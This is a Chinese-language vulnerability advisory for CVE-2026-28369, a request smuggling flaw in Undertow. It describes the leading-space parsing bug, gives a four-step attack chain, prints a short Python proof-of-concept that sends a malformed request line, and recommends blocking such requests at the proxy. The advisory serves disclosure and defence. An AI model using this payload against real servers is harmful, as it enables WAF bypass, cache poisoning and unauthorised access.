CVE-2026-28369 CVSS 8.7 高危

CVE-2026-28369 Undertow请求走私漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-28369

漏洞类型

HTTP请求走私

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Undertow

漏洞概述

Undertow在处理HTTP请求时存在安全漏洞，当请求头的首行包含前导空格时，Undertow会错误地将其去除。这种不符合HTTP标准的处理方式导致前后端解析不一致。远程攻击者可利用此漏洞实施请求走私攻击，绕过安全控制机制，窃取敏感数据或操纵Web缓存，对系统安全性造成严重影响。

技术细节

该漏洞产生于Undertow对HTTP请求头行起始字符的解析逻辑。标准HTTP协议规定请求行不应包含前导空格，但Undertow在接收此类畸形请求时，会自动去除开头的空格并继续处理。在典型的反向代理（如Nginx）与Undertow后端组合的架构中，如果前端代理严格遵循标准或对空格的处理与后端不同，就会导致请求边界解析的同步性被破坏。攻击者通过精心构造带有前导空格和特定Content-Length的请求，可以混淆后端对请求结束位置的判断，从而将恶意请求“走私”进下一个连接中。这允许攻击者绕过WAF等安全设备的检测，进行缓存投毒或未授权访问。

攻击链分析

STEP 1

侦察

识别目标服务器是否使用Undertow作为后端容器，并确认是否存在反向代理。

STEP 2

构造恶意请求

攻击者构造一个HTTP请求，其请求头行以一个或多个空格开头（如' GET /...'),并调整Content-Length以混淆请求边界。

STEP 3

发送请求

将构造好的畸形请求发送给目标服务器。前端代理可能将其视为一个请求，而Undertow解析为另一个请求。

STEP 4

请求走私

利用解析差异，将后续的请求 smuggling 进链路，绕过安全检查，访问受限接口或投毒缓存。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

def smuggle_request(host, port):
    # Create a socket connection
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))

    # Payload with leading space to trigger the vulnerability
    # This exploits the stripping of leading spaces
    payload = (
        " GET / HTTP/1.1\r\n"
        "Host: {}\r\n"
        "Content-Length: 10\r\n"
        "\r\n"
        "SMUGGLED"
    ).format(host)

    s.send(payload.encode())
    response = s.recv(4096)
    print(response.decode())
    s.close()

if __name__ == "__main__":
    smuggle_request("127.0.0.1", 8080)

影响范围

Undertow (具体受影响版本请参考官方安全通告)

防御指南

临时缓解措施

在无法立即升级的情况下，建议在前端代理（如Nginx、Apache）或WAF设备上配置规则，主动拦截并丢弃请求头行以空格开头的HTTP请求，确保进入后端Undertow的流量符合标准规范，从而阻断请求 smuggling 攻击路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表